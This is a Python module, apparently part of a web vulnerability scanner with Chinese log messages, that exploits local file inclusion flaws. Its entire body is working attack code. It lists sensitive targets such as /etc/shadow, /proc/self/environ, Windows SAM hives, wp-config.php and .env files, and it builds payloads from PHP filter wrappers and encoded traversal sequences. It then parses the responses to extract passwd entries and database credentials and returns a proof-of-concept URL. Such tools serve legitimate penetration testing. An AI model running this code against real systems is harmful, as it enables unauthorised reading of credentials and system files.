#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
LFI（本地文件包含）漏洞利用模块
"""

import logging
import re
import urllib.parse
import random
import string
import base64

logger = logging.getLogger('xss_scanner')

class LFIExploit:
    """Confirm Local File Inclusion (LFI) findings by reading known files.

    For a finding (URL plus vulnerable query parameter) the class replaces
    the parameter value with a series of file-path payloads, requests each
    rewritten URL and inspects HTTP 200 responses for content that looks
    like the requested file.

    The HTTP client only needs a ``get(url)`` method whose return value
    exposes ``status_code`` and ``text`` attributes.
    """

    # Maximum number of characters of recovered content kept in a result.
    PREVIEW_LENGTH = 1000

    def __init__(self, http_client):
        """
        Set up the payload tables used by the exploit stages.

        Args:
            http_client: HTTP client object used to send the GET requests.
        """
        self.http_client = http_client

        # Candidate files to read
        self.sensitive_files = [
            # Linux system files
            "/etc/passwd",
            "/etc/shadow",
            "/etc/hosts",
            "/etc/issue",
            "/etc/group",
            "/etc/motd",
            "/proc/self/environ",
            "/proc/version",
            "/proc/cmdline",
            "/proc/sched_debug",
            "/proc/mounts",
            "/proc/net/tcp",
            "/proc/net/udp",
            "/proc/net/fib_trie",
            "/proc/net/route",

            # Windows system files
            "C:\\Windows\\system32\\drivers\\etc\\hosts",
            "C:\\Windows\\win.ini",
            "C:\\boot.ini",
            "C:\\Windows\\System32\\config\\SAM",
            "C:\\Windows\\repair\\SAM",
            "C:\\Windows\\System32\\config\\RegBack\\SAM",

            # Web server configuration files
            "/etc/httpd/conf/httpd.conf",
            "/etc/apache2/apache2.conf",
            "/etc/nginx/nginx.conf",
            "/usr/local/etc/nginx/nginx.conf",
            "/usr/local/nginx/conf/nginx.conf",

            # Web application configuration files
            "/var/www/html/config.php",
            "/var/www/html/wp-config.php",
            "/var/www/html/configuration.php",
            "/var/www/config/config.ini",
            ".env",
            "web.config",
            "config.json",
            "settings.py",

            # Log files
            "/var/log/apache2/access.log",
            "/var/log/apache2/error.log",
            "/var/log/nginx/access.log",
            "/var/log/nginx/error.log",
            "/var/log/httpd/access_log",
            "/var/log/httpd/error_log",
            "/var/log/apache/access.log",
            "/var/log/apache/error.log",
            "/usr/local/apache/log/error_log",
            "/usr/local/apache2/log/error_log"
        ]

        # PHP stream wrappers
        self.php_wrappers = [
            "php://filter/convert.base64-encode/resource=",
            "php://filter/read=convert.base64-encode/resource=",
            "phar://",
            "zip://",
            "data://text/plain;base64,"
        ]

        # Directory traversal sequences
        self.traversal_patterns = [
            "../",
            "..\\",
            "..%2f",
            "..%5c",
            "%2e%2e%2f",
            "%2e%2e/",
            "..%252f",
            "%252e%252e%252f",
            "....//",
            "....\\\\",
            ".../",
            "...\\",
            "%c0%ae%c0%ae/",
            "%25c0%25ae%25c0%25ae/"
        ]

        # Parameter names commonly associated with file inclusion
        self.common_parameters = [
            "file",
            "page",
            "path",
            "filepath",
            "filename",
            "load",
            "include",
            "require",
            "doc",
            "document",
            "folder",
            "root",
            "cont",
            "content",
            "layout",
            "mod",
            "module",
            "conf",
            "config",
            "url",
            "uri",
            "source",
            "src",
            "show",
            "view",
            "template"
        ]

    def exploit(self, vulnerability):
        """
        Try to read a known file through the reported LFI.

        Three stages are attempted in order, stopping at the first success:
        direct file paths, PHP wrapper payloads, then traversal prefixes of
        depth 1 to 10.

        Args:
            vulnerability: Mapping describing the finding. The keys ``url``
                and ``parameter`` are read; both must be non-empty.

        Returns:
            dict: ``success``, ``message`` and ``data`` keys; successful
            results additionally carry the rewritten URL under ``poc``.
        """
        # Use .get() so that a finding without a URL reaches the validation
        # below instead of raising KeyError while logging.
        url = vulnerability.get('url')
        parameter = vulnerability.get('parameter')
        logger.info("尝试利用LFI漏洞: %s", url)

        if not url or not parameter:
            return {
                'success': False,
                'message': '缺少必要的漏洞信息(URL或参数名)',
                'data': None
            }

        # Stage 1: direct paths (first 10 files only)
        for file_path in self.sensitive_files[:10]:
            result = self._try_file_access(url, parameter, file_path)
            if result and result['success']:
                return result

        # Stage 2: PHP wrappers, in case the target is a PHP application
        # (first 3 wrappers x first 5 files)
        for wrapper in self.php_wrappers[:3]:
            for file_path in self.sensitive_files[:5]:
                result = self._try_wrapper_access(url, parameter, wrapper, file_path)
                if result and result['success']:
                    return result

        # Stage 3: traversal prefixes
        # (first 5 patterns x depth 1..10 x first 3 files)
        for traversal in self.traversal_patterns[:5]:
            for depth in range(1, 11):
                traversal_path = traversal * depth
                for file_path in self.sensitive_files[:3]:
                    result = self._try_traversal_access(url, parameter, traversal_path, file_path)
                    if result and result['success']:
                        return result

        return {
            'success': False,
            'message': '未能成功利用LFI漏洞',
            'data': None
        }

    @staticmethod
    def _build_injected_url(url, parameter, value):
        """Return ``url`` with query parameter ``parameter`` set to ``value``."""
        parsed = urllib.parse.urlparse(url)
        # keep_blank_values=True: otherwise parameters such as "debug=" are
        # silently dropped from the rebuilt URL.
        query = dict(urllib.parse.parse_qsl(parsed.query, keep_blank_values=True))
        query[parameter] = value
        return urllib.parse.urlunparse(
            parsed._replace(query=urllib.parse.urlencode(query))
        )

    def _fetch_with_payload(self, url, parameter, value):
        """Send the injected request; return ``(injected_url, body or None)``.

        The body is only returned for a truthy response with status 200.
        """
        injected_url = self._build_injected_url(url, parameter, value)
        response = self.http_client.get(injected_url)
        if response and response.status_code == 200:
            return injected_url, response.text
        return injected_url, None

    def _content_preview(self, content):
        """Truncate ``content`` to PREVIEW_LENGTH, marking truncation with '...'."""
        suffix = '...' if len(content) > self.PREVIEW_LENGTH else ''
        return content[:self.PREVIEW_LENGTH] + suffix

    @staticmethod
    def _relative_target(file_path):
        """Strip the root (leading slash or drive prefix) from ``file_path``.

        The directory components are kept so that a traversal prefix
        followed by the result still points at the intended file.
        """
        if file_path.startswith('/'):
            return file_path.lstrip('/')
        without_drive = re.sub(r'^[A-Za-z]:[\\/]+', '', file_path)
        if without_drive != file_path:
            return without_drive.replace('\\', '/')
        return file_path

    def _try_file_access(self, url, parameter, file_path):
        """
        Request ``file_path`` directly through the vulnerable parameter.

        Args:
            url: Target URL.
            parameter: Name of the vulnerable query parameter.
            file_path: Path of the file to read.

        Returns:
            dict: Success result, or None when nothing was recovered or the
            request failed (failures are logged, not raised).
        """
        try:
            logger.info("尝试访问文件: %s", file_path)
            injected_url, body = self._fetch_with_payload(url, parameter, file_path)
            file_content = self._extract_file_content(body, file_path)
            if file_content:
                logger.info("成功读取文件: %s", file_path)
                return {
                    'success': True,
                    'message': f'成功利用LFI漏洞读取文件: {file_path}',
                    'data': {
                        'file_path': file_path,
                        'file_content': self._content_preview(file_content),
                        'full_content_length': len(file_content)
                    },
                    'poc': injected_url
                }
        except Exception as e:
            # Best-effort probe: one failed request must not abort the run.
            logger.error("尝试访问文件时出错: %s", e)

        return None

    def _try_wrapper_access(self, url, parameter, wrapper, file_path):
        """
        Request ``wrapper + file_path`` and decode a Base64 response.

        Args:
            url: Target URL.
            parameter: Name of the vulnerable query parameter.
            wrapper: PHP wrapper prefix.
            file_path: Path of the file to read.

        Returns:
            dict: Success result, or None when nothing was recovered or the
            request failed (failures are logged, not raised).
        """
        try:
            payload = wrapper + file_path
            logger.info("尝试使用包装器访问文件: %s", payload)
            injected_url, body = self._fetch_with_payload(url, parameter, payload)
            base64_content = self._extract_base64_content(body)
            if base64_content:
                try:
                    decoded_content = base64.b64decode(base64_content).decode('utf-8', errors='ignore')
                except ValueError as e:
                    logger.error("Base64解码失败: %s", e)
                else:
                    logger.info("成功使用包装器读取文件: %s", file_path)
                    return {
                        'success': True,
                        'message': f'成功利用LFI漏洞使用PHP包装器读取文件: {file_path}',
                        'data': {
                            'file_path': file_path,
                            'wrapper': wrapper,
                            'file_content': self._content_preview(decoded_content),
                            'full_content_length': len(decoded_content)
                        },
                        'poc': injected_url
                    }
        except Exception as e:
            # Best-effort probe: one failed request must not abort the run.
            logger.error("尝试使用包装器访问文件时出错: %s", e)

        return None

    def _try_traversal_access(self, url, parameter, traversal_path, file_path):
        """
        Request ``file_path`` behind a directory-traversal prefix.

        Args:
            url: Target URL.
            parameter: Name of the vulnerable query parameter.
            traversal_path: Traversal prefix (already repeated to the
                desired depth).
            file_path: Path of the file to read.

        Returns:
            dict: Success result, or None when nothing was recovered or the
            request failed (failures are logged, not raised).
        """
        try:
            # Keep the directory components: reducing "/etc/passwd" to
            # "passwd" would make the prefixed path point at a different file
            # than the one whose signature is checked below.
            payload = traversal_path + self._relative_target(file_path)
            logger.info("尝试使用目录遍历访问文件: %s", payload)
            injected_url, body = self._fetch_with_payload(url, parameter, payload)
            file_content = self._extract_file_content(body, file_path)
            if file_content:
                logger.info("成功使用目录遍历读取文件: %s", file_path)
                return {
                    'success': True,
                    'message': f'成功利用LFI漏洞使用目录遍历读取文件: {file_path}',
                    'data': {
                        'file_path': file_path,
                        'traversal_pattern': traversal_path,
                        'file_content': self._content_preview(file_content),
                        'full_content_length': len(file_content)
                    },
                    'poc': injected_url
                }
        except Exception as e:
            # Best-effort probe: one failed request must not abort the run.
            logger.error("尝试使用目录遍历访问文件时出错: %s", e)

        return None

    def _extract_file_content(self, response_text, file_path):
        """
        Pull the content of ``file_path`` out of a response body.

        For recognised file types the body must contain that type's
        signature; if it does not, None is returned rather than falling back
        to the generic heuristics, so plain-text error pages are not reported
        as successful reads. Unrecognised files use the generic heuristics
        only.

        Args:
            response_text: Response body (may be None or empty).
            file_path: Path of the file that was requested.

        Returns:
            str: Extracted content, or None when nothing convincing is found.
        """
        if not response_text:
            return None

        # Normalise separators and case so Windows-style paths reach the same
        # checks as POSIX ones.
        path = file_path.replace('\\', '/').lower()

        if '/etc/passwd' in path:
            if not re.search(r"root:.*:0:0:", response_text):
                return None
            passwd_lines = re.findall(r"([a-z_][a-z0-9_-]*:[^:]*:[0-9]*:[0-9]*:[^:]*:[^:]*:[^\n]*)", response_text)
            if passwd_lines:
                return "\n".join(passwd_lines)

        elif '/etc/hosts' in path:
            if not re.search(r"127\.0\.0\.1\s+localhost", response_text):
                return None
            hosts_content = re.search(r"(127\.0\.0\.1\s+localhost.*?)(</|\n\n|$)", response_text, re.DOTALL)
            if hosts_content:
                return hosts_content.group(1)

        elif 'win.ini' in path:
            if not re.search(r"\[fonts\]|\[extensions\]", response_text, re.IGNORECASE):
                return None
            win_ini_content = re.search(r"(\[fonts\].*?)(</|\n\n|$)", response_text, re.DOTALL | re.IGNORECASE)
            if win_ini_content:
                return win_ini_content.group(1)

        # Logs are checked before the Apache config branch: paths such as
        # /var/log/apache2/access.log contain "apache" but are not configs.
        elif '.log' in path or path.endswith('_log'):
            if not re.search(r"\[\d{2}/\w{3}/\d{4}.*?\]|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", response_text):
                return None
            log_entries = re.findall(r"(\[\d{2}/\w{3}/\d{4}.*?\].*?)\n", response_text)
            if log_entries:
                return "\n".join(log_entries[:20]) + ("\n..." if len(log_entries) > 20 else "")

        elif 'httpd.conf' in path or 'apache' in path:
            if not re.search(r"<VirtualHost|ServerName|DocumentRoot", response_text):
                return None
            apache_content = re.search(r"(ServerName.*?|<VirtualHost.*?|DocumentRoot.*?)(</|\n\n|$)", response_text, re.DOTALL)
            if apache_content:
                return apache_content.group(1)

        elif 'nginx.conf' in path:
            if not re.search(r"server\s*{|http\s*{|location\s*", response_text):
                return None
            nginx_content = re.search(r"(server\s*{.*?|http\s*{.*?)(</|\n\n|$)", response_text, re.DOTALL)
            if nginx_content:
                return nginx_content.group(1)

        elif '.php' in path:
            if not re.search(r"<\?php|DB_|PASSWORD|HOST|USER", response_text, re.IGNORECASE):
                return None
            php_content = re.search(r"(<\?php.*?\?>|define\s*\(\s*['\"](DB_|HOST|USER|PASSWORD).*?;)", response_text, re.DOTALL | re.IGNORECASE)
            if php_content:
                return php_content.group(1)

        # Generic heuristics: reached for unrecognised files, or when a
        # signature matched but the targeted extraction found nothing.
        file_extension = path.split('.')[-1] if '.' in path else ''

        if file_extension in ['txt', 'ini', 'conf', 'config', 'json', 'xml', 'yaml', 'yml']:
            # Structured-text file: accept a body containing typical
            # structural characters.
            if re.search(r"[\{\}\[\]=:\\><\n]", response_text) and len(response_text) > 20:
                return response_text[:self.PREVIEW_LENGTH]

        # Otherwise accept any reasonably long body that is not an HTML page.
        if not re.search(r"<!DOCTYPE html>|<html|<body|<head", response_text, re.IGNORECASE) and len(response_text) > 20:
            return response_text[:self.PREVIEW_LENGTH]

        return None

    def _extract_base64_content(self, response_text):
        """
        Find a Base64 run in the response that decodes to file-like text.

        Args:
            response_text: Response body (may be None or empty).

        Returns:
            str: The first Base64 run (still encoded) whose decoded text is
            longer than 20 characters and contains one of the expected
            markers, or None when there is no such run.
        """
        if not response_text:
            return None

        for candidate in re.findall(r"([A-Za-z0-9+/]{20,}={0,2})", response_text):
            try:
                decoded = base64.b64decode(candidate).decode('utf-8', errors='ignore')
            except ValueError:
                # binascii.Error (bad length/padding): not real Base64.
                continue

            if len(decoded) > 20 and re.search(r"<\?php|root:|DOCTYPE|html|password=", decoded, re.IGNORECASE):
                return candidate

        return None